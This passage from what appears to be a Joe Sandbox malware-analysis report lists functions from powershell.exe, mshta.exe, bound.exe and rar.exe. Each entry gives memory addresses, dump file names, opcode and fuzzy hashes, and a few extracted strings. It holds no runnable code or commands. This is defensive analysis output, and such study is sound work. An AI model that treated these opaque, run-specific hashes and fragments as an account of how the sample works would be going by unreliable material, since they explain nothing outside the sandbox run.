Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 9100e53536d32808e974d7d27de713845656aa507fe9fee0e2e00853a6d84115
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 7301A73121CB0C4FD748EF4CE451AA5B7E0FB85324F10056DE58AC36A5DA36E882CB42

Function 00007FFD9A42432D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2014004563.00007FFD9A420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15fc3b74948afd3aacabb71e663b11ea32b2b4193fa9768fa52106e0430c21ff
Instruction ID: 88f9877ee03809f7bb0d7f649003447239f600d7d98077b2459d45da05403a40
Opcode Fuzzy Hash: 15fc3b74948afd3aacabb71e663b11ea32b2b4193fa9768fa52106e0430c21ff
Instruction Fuzzy Hash: 9EF09A32B0C5058FD7BCEA8CA8558A873E0EF4432071100BAE15DC70ABCA25EC41CB81

Function 00007FFD9A35A1F3 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc84a4e5a8b4368e07ff36ffe9dbc9601d132d2d7246fcd467d3dfe1b5c610f
Instruction ID: aa0d408cb72c4523e2f1d1ac499207c7e76c9fc2c6f43bcf54b0574ebfea521b
Opcode Fuzzy Hash: 3dc84a4e5a8b4368e07ff36ffe9dbc9601d132d2d7246fcd467d3dfe1b5c610f
Instruction Fuzzy Hash: 59F0B432A145498FD704FFBCE8A65EA37A0EF94319B084177E85CC71A6DE34A5448BC2

Function 00007FFD9A4245E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2014004563.00007FFD9A420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec7d16c115338f56a3891b329d589add60a10041ab74efa37b61df46972cfcb8
Instruction ID: 0cc80b063f8363614151e2d9a8af4f3016ed0a11d83de49fcf1fc5c2014fbc60
Opcode Fuzzy Hash: ec7d16c115338f56a3891b329d589add60a10041ab74efa37b61df46972cfcb8
Instruction Fuzzy Hash: E4F08232B0D5448FDB68EF8CE8558A877E0EF0532571500F6E15DCB5ABCA29EC54CB81

Non-executed Functions

Function 00007FFD9A358763 Relevance: 7.6, Strings: 6, Instructions: 72COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9A3587B2
L_^, xrefs: 00007FFD9A3587F2
L_^, xrefs: 00007FFD9A358772
L_^, xrefs: 00007FFD9A3587C2
L_^, xrefs: 00007FFD9A3587E2
L_^, xrefs: 00007FFD9A358792

Memory Dump Source

Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^$L_^$L_^
API String ID: 0-2894164595
Opcode ID: 3ec7380cbf694c6a67e99fafa0a0671d6f932f4378c861d3d8c658d88ebd2e2b
Instruction ID: 0fad8df557d6eef22a82a482a4df70746b90b4d8dc7df8aeaf4c55a7758313ca
Opcode Fuzzy Hash: 3ec7380cbf694c6a67e99fafa0a0671d6f932f4378c861d3d8c658d88ebd2e2b
Instruction Fuzzy Hash: E621A966A1D7C14FE36657B598B51A83FA05F92304F0D60FBD4F84B1E7E91C284E8352

Function 00007FFD9A3584FA Relevance: 7.6, Strings: 6, Instructions: 59COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9A35859A
L_^, xrefs: 00007FFD9A35850A
L_^, xrefs: 00007FFD9A35857A
L_^, xrefs: 00007FFD9A3584FA
L_^, xrefs: 00007FFD9A35855A
L_^, xrefs: 00007FFD9A35853A

Memory Dump Source

Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^$L_^$L_^
API String ID: 0-2894164595
Opcode ID: 76c4aa4eed41d04eadbc94e7298b0c0de9041d7503e04077e76bd273214662e3
Instruction ID: 0551afbe4fe60e37389e3371f2178d196ba8fb9d48f9c9c1f23fe89f15e97e81
Opcode Fuzzy Hash: 76c4aa4eed41d04eadbc94e7298b0c0de9041d7503e04077e76bd273214662e3
Instruction Fuzzy Hash: FF117263F0D7C28EE3564BB948B50A83FA06E9231471D54FBC0EC5B0A3E928A84BD351

Function 00007FFD9A358BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

L_^F, xrefs: 00007FFD9A358C6A
L_^6, xrefs: 00007FFD9A358BFA
L_^J, xrefs: 00007FFD9A358C7A
L_^<, xrefs: 00007FFD9A358C2A
L_^I, xrefs: 00007FFD9A358C72

Memory Dump Source

Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd

Similarity

API ID:
String ID: L_^6$L_^<$L_^F$L_^I$L_^J
API String ID: 0-1031638419
Opcode ID: 74387117d6bf6d943dc49a83f9b86094813edf986d57997cae0793b7affaf55c
Instruction ID: 64c0cd0706abcdbceec9a88389dbc203629f66a015df682c7d3560f889e88eee
Opcode Fuzzy Hash: 74387117d6bf6d943dc49a83f9b86094813edf986d57997cae0793b7affaf55c
Instruction Fuzzy Hash: 5D21F177B184165ED3027BBDBC119EC7380DBD427A34891B3D768CB557DA14B08B8AE1

Function 00007FFD9A35864B Relevance: 6.3, Strings: 5, Instructions: 45COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9A35869A
L_^, xrefs: 00007FFD9A35865A
L_^, xrefs: 00007FFD9A35866A
L_^, xrefs: 00007FFD9A35867A
L_^, xrefs: 00007FFD9A3586AA

Memory Dump Source

Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^$L_^
API String ID: 0-2264858084
Opcode ID: 0a6b2d79a9cd6008a787187f0ad5be232cf3c18e9405a890a5f555de5f83a8c7
Instruction ID: e2d3d46d96ed507fe8e5b65041df5f0034fb638af08822670f7187dcb396a84b
Opcode Fuzzy Hash: 0a6b2d79a9cd6008a787187f0ad5be232cf3c18e9405a890a5f555de5f83a8c7
Instruction Fuzzy Hash: 70017593F0D7D24AE35712BA08B90982FD09E93324B1E55FBD0EC5B0A3A915284BD351

Analysis Process: mshta.exePID: 7912, Parent PID: 7740COMMON

Executed Functions

Function 0000025A3A4A0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000003.1840060143.0000025A3A4A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025A3A4A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_25a3a4a0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 9164435bee858f51dc12e1468b3b47a193d09d7d0cdc0233cc737549bf87df0a
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 6D90020449581666D41451910C4A25C504063C8359FD445C09517A0144D49D02D61157

Analysis Process: bound.exePID: 7944, Parent PID: 7708COMMON

Executed Functions

Function 00007FFD9A3326A4 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

8[8d, xrefs: 00007FFD9A3328BA

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID: 8[8d
API String ID: 0-695392185
Opcode ID: bb7f7d7593fc18430975395fe89271af27eddbcd70e9b5e2ddfbe307be2f8c7f
Instruction ID: 8f7aedfa2ad8add5c7bb247815f8c3640dd1c173e9494a322421c42f975968e0
Opcode Fuzzy Hash: bb7f7d7593fc18430975395fe89271af27eddbcd70e9b5e2ddfbe307be2f8c7f
Instruction Fuzzy Hash: CA71627190964A8FDB99EBA9C4A57FDBBF0FF59300F4444BEC049D71A2CA38A845CB00

Function 00007FFD9A3315D2 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

h[8d, xrefs: 00007FFD9A331606

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID: h[8d
API String ID: 0-3800029211
Opcode ID: 86c9d955d3d735f666b4415b6f407b53cf428a4307350607ba2090b158bb4f3c
Instruction ID: 5dffac5e8329f610e21e2783fae5b715e464098fcd763a7cfe2ca0c9ea44c7eb
Opcode Fuzzy Hash: 86c9d955d3d735f666b4415b6f407b53cf428a4307350607ba2090b158bb4f3c
Instruction Fuzzy Hash: 70214C72E0D5894FEBA9DBA8883A3E57BE0EF59310F0800FDD489D32D6DD285D468740

Function 00007FFD9A3315C4 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5806bb177f1fdc1c004ecafd907250b0bcad70fa3fff19119aa9cb3f4687bf
Instruction ID: 10530c47370c4d7ad1ffdc3fee65614702b385325c9cee1ad9f92390bd74ac5c
Opcode Fuzzy Hash: bb5806bb177f1fdc1c004ecafd907250b0bcad70fa3fff19119aa9cb3f4687bf
Instruction Fuzzy Hash: 54412A32E0D64A4FFBB8A6A888253F577E0EF59300F5401FDD48DD72E6DE3868468681

Function 00007FFD9A3317A7 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09064f58c254d955bf43755479458f873f58164b327397422093290d2d50cf13
Instruction ID: 9548f15ac7f582fa4cb834d3499e28afe46771d8c31c7385482b6499dd7a42fd
Opcode Fuzzy Hash: 09064f58c254d955bf43755479458f873f58164b327397422093290d2d50cf13
Instruction Fuzzy Hash: 93314631A186498FDBA8EF64C890BE9B3A1FF49304F9005EDD41DC7286CF35A992CB40

Function 00007FFD9A331941 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405ccffb28e4090469dbe77b45a360b0325496570c76c4874d92818691fe8493
Instruction ID: 35cc34348edbf7acff8a5b7701b0f44a87dcdad362419c683ca3e85d9a3e0871
Opcode Fuzzy Hash: 405ccffb28e4090469dbe77b45a360b0325496570c76c4874d92818691fe8493
Instruction Fuzzy Hash: EF212A71E0860A9FDB58EF94C4A55FE77B1EF54301F5000BAE419D7296CF35A941CB90

Function 00007FFD9A33163A Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acca100d0ea053bad37307adc9e1c80b4e9907fcb3f9b38e955eb0255b40d376
Instruction ID: faca3ebc3240a9d25a1c09e9b0130b9ddf3dbb273197e2049a787b2e0dedaba9
Opcode Fuzzy Hash: acca100d0ea053bad37307adc9e1c80b4e9907fcb3f9b38e955eb0255b40d376
Instruction Fuzzy Hash: B5115C72E0D54D5FEBB8EAA488256F97BE0EF59300F0801FDD48DD32D6DD2859458740

Function 00007FFD9A330670 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb1057f0bb58fb0b9fbd9b58336f8f42a053f7b856e3e3da00d3f36bd8b50d8
Instruction ID: fd5c90726c13cfeab7934ef848e90bffbd5101d5c16dfabb0707ac25f4b7684a
Opcode Fuzzy Hash: 0eb1057f0bb58fb0b9fbd9b58336f8f42a053f7b856e3e3da00d3f36bd8b50d8
Instruction Fuzzy Hash: 0921F971E18A0E9FEB58EF94C4655FE77B1EF54301F5000BDE419D62A5CE35A940CB90

Function 00007FFD9A33184D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a3c35fc931e9ed29f3820c3dafb2b4cc229fab29183e6a6b85713ff53878b8
Instruction ID: f6e2930b7a3ee50179657d3508ea17aff4a35f5e3a402f8536719b0eef5777e8
Opcode Fuzzy Hash: a0a3c35fc931e9ed29f3820c3dafb2b4cc229fab29183e6a6b85713ff53878b8
Instruction Fuzzy Hash: 2A11F370A14A4D8FDB98DF18C894BE9B7B1FF58304F5005E9D81DC7286CB75A992CB40

Function 00007FFD9A331435 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c805ce76bbc8dde30dfbb94dc79e79f17786d04cc4be455ea4dce8ab50395142
Instruction ID: af01dab4fd9d92d5b3801fd85a2c1537e59fa794944855138b503a21cb0b78ec
Opcode Fuzzy Hash: c805ce76bbc8dde30dfbb94dc79e79f17786d04cc4be455ea4dce8ab50395142
Instruction Fuzzy Hash: B8111C749096588FDB94EB38C899BA9BBB1FF15304F0045EAD00DD72A6CE349D80CB01

Function 00007FFD9A3313BA Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b86bb6fb89551256c177c6c744c845cb587ba5c5e221721f04f4e5e62f2866
Instruction ID: eacf8e699116a889165db2ec6d691f857c96f9cd895eed0033843ad3913bbd9d
Opcode Fuzzy Hash: 94b86bb6fb89551256c177c6c744c845cb587ba5c5e221721f04f4e5e62f2866
Instruction Fuzzy Hash: 551106749096598FDB94EB28C899BA8B7B1EF15304F4045EAD40CD72A5CE34AD80DB00

Function 00007FFD9A3325F7 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c8fffbaacaba19584bdb3322a5a779aefee0cb4654c1c7fbaf4769fa5ea82e
Instruction ID: 0d9d970d24579ff33955fdbc05d6d9f298e39bb166f944a4e5376db468223f11
Opcode Fuzzy Hash: 10c8fffbaacaba19584bdb3322a5a779aefee0cb4654c1c7fbaf4769fa5ea82e
Instruction Fuzzy Hash: 59015E30A0895D8FDB94EB28C8A9BA9B7F1FF1A300F4444E5C44CD72A2CE346C86CB40

Function 00007FFD9A3316ED Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 501a06837db5ed9531ee3fdf7b84f8e2dec223fa36038f891f4b04b1d49b68bf
Instruction ID: 0881fda67f2a83dec65c89b6207e563ccc4d7772b0556807348641bce5c0ce7d
Opcode Fuzzy Hash: 501a06837db5ed9531ee3fdf7b84f8e2dec223fa36038f891f4b04b1d49b68bf
Instruction Fuzzy Hash: 60F03A31E0D60D8EEBACEAA4C466BECB2B1EF55300F5001FDD25ED22E1DE3559818A80

Function 00007FFD9A331516 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b588b67fd3d5b6c39ca94523d991444fc4f8d39b6083db6af49ed51c11903a8
Instruction ID: de45a7928e0b74d95fec9e9188cac71b15fe6d774f644e7de1fcee2538bcfca5
Opcode Fuzzy Hash: 6b588b67fd3d5b6c39ca94523d991444fc4f8d39b6083db6af49ed51c11903a8
Instruction Fuzzy Hash: 6AE04FB49096995FC750DFA888A92FABBF0FF15200F0444FEC448E72A1CA7019849B00

Function 00007FFD9A330FC0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1799393983.00007FFD9A330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffd9a330000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ba5aa296160211717bd65f08ffcfc930938ba2dabecb487ecdef32838b2e13
Instruction ID: 56fd6c5ba9f12e4caa41ea05a645dd220113895cf0cb531309832b95fc674d25
Opcode Fuzzy Hash: 81ba5aa296160211717bd65f08ffcfc930938ba2dabecb487ecdef32838b2e13
Instruction Fuzzy Hash: E5D02B20E6D1990EC385E73488341A9BFA0AF05004F0480FCC09DE70E3CC1068858341

Analysis Process: powershell.exePID: 8712, Parent PID: 8504COMMON

Executed Functions

Function 00007FFD9A4117D9 Relevance: .8, Instructions: 769COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2115664923.00007FFD9A410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffd9a410000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c07d88a09609a8de5e95970f1f3caa0b4e430a687028132def3282a672eee33d
Instruction ID: b6b2e551d9c3c21c895e18ef9a6994a392808fcfe8d96f75b8b89a8a5320cd39
Opcode Fuzzy Hash: c07d88a09609a8de5e95970f1f3caa0b4e430a687028132def3282a672eee33d
Instruction Fuzzy Hash: E4222322B0DAC94FE7AA9B7C48745B57BE1EF96210B1800FFD09DC71D7E918A806C342

Function 00007FFD9A344D20 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

^, xrefs: 00007FFD9A344D42
^, xrefs: 00007FFD9A344DE2

Memory Dump Source

Source File: 0000002E.00000002.2114299390.00007FFD9A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffd9a340000_powershell.jbxd

Similarity

API ID:
String ID: ^$^
API String ID: 0-3830990845
Opcode ID: ee63e05b38f2bd05d46076681c02ac3571f42f2fa28d203f14b664d4281edd6d
Instruction ID: b067df4e6483f055797ba23ab296d8fd3171982e09875567c732bc34f124f08c
Opcode Fuzzy Hash: ee63e05b38f2bd05d46076681c02ac3571f42f2fa28d203f14b664d4281edd6d
Instruction Fuzzy Hash: B2A1E632E0DA8A8FE759EBACD8652ED7BF0EF46314F0441BED44997193CA296842C740

Function 00007FFD9A343945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2114299390.00007FFD9A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffd9a340000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 49ae7e7125a853b966c89d4d90213ed285e878363835d8af4085bf37d8dc3cf8
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: C201A73121CB0C4FD748EF4CE451AA5B7E0FB85324F10056DE58AC3695D636E881CB42

Analysis Process: rar.exePID: 8992, Parent PID: 9144COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1209
Total number of Limit Nodes:	37

Executed Functions

Function 00007FF6D7ED1884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

%s%s , xrefs: 00007FF6D7ED2A46
rar, xrefs: 00007FF6D7ED18AA
,6, xrefs: 00007FF6D7ED2F83
sfx, xrefs: 00007FF6D7ED1884
.ext, xrefs: 00007FF6D7ED18C0
exe, xrefs: 00007FF6D7ED1897
q:, xrefs: 00007FF6D7ED19DA
BK, xrefs: 00007FF6D7ED19C5

Memory Dump Source

Source File: 00000053.00000002.2145809940.00007FF6D7ED1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF6D7ED0000, based on PE: true

Associated: 00000053.00000002.2145768157.00007FF6D7ED0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2145997517.00007FF6D7F58000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146031386.00007FF6D7F59000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F5A000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F64000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F6E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F76000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146235048.00007FF6D7F78000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146294833.00007FF6D7F7E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_83_2_7ff6d7ed0000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: 5d91ed339d1634cb5a2c702478601efa01ca129259e3f82cdc22d41a5736d98b
Instruction ID: daa78cdb95759bb4ef66fe95222caa2d909430007b371a9fcb77b863f0423a25
Opcode Fuzzy Hash: 5d91ed339d1634cb5a2c702478601efa01ca129259e3f82cdc22d41a5736d98b
Instruction Fuzzy Hash: 26E2BE26A08AC289EB20DF25D8402FD27A6FBC5788F454037DA5D8BB96DF3DD564C306

Function 00007FF6D7F1B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF6D7F1B9F8
SetThreadPriority.KERNEL32 ref: 00007FF6D7F1BA4E

Part of subcall function 00007FF6D7EECDA4: wcschr.LIBVCRUNTIME ref: 00007FF6D7EECE0F
Part of subcall function 00007FF6D7EECDA4: wcschr.LIBVCRUNTIME ref: 00007FF6D7EECE22

Part of subcall function 00007FF6D7EECA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF6D7EECEDE

Strings

CreateThread failed, xrefs: 00007FF6D7F1BA06

Memory Dump Source

Source File: 00000053.00000002.2145809940.00007FF6D7ED1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF6D7ED0000, based on PE: true

Associated: 00000053.00000002.2145768157.00007FF6D7ED0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2145997517.00007FF6D7F58000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146031386.00007FF6D7F59000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F5A000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F64000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F6E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F76000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146235048.00007FF6D7F78000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146294833.00007FF6D7F7E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_83_2_7ff6d7ed0000_rar.jbxd

Similarity

API ID: Threadwcschr$CreateExceptionPriorityThrow
String ID: CreateThread failed
API String ID: 1217111108-3849766595
Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction ID: a57cf869c55bacff544c3456d4648233060c61e996174434469912003c55a234
Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction Fuzzy Hash: 85115132A08A42D2E725DB24E8411BD7370FB84B98F944533DA9D83669DF3CE666C741

Function 00007FF6D7F038A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000053.00000002.2145809940.00007FF6D7ED1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF6D7ED0000, based on PE: true

Associated: 00000053.00000002.2145768157.00007FF6D7ED0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2145997517.00007FF6D7F58000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146031386.00007FF6D7F59000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F5A000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F64000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F6E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F76000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146235048.00007FF6D7F78000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146294833.00007FF6D7F7E000.00000002.00000001.01000000.00000022.sdmpDownload File

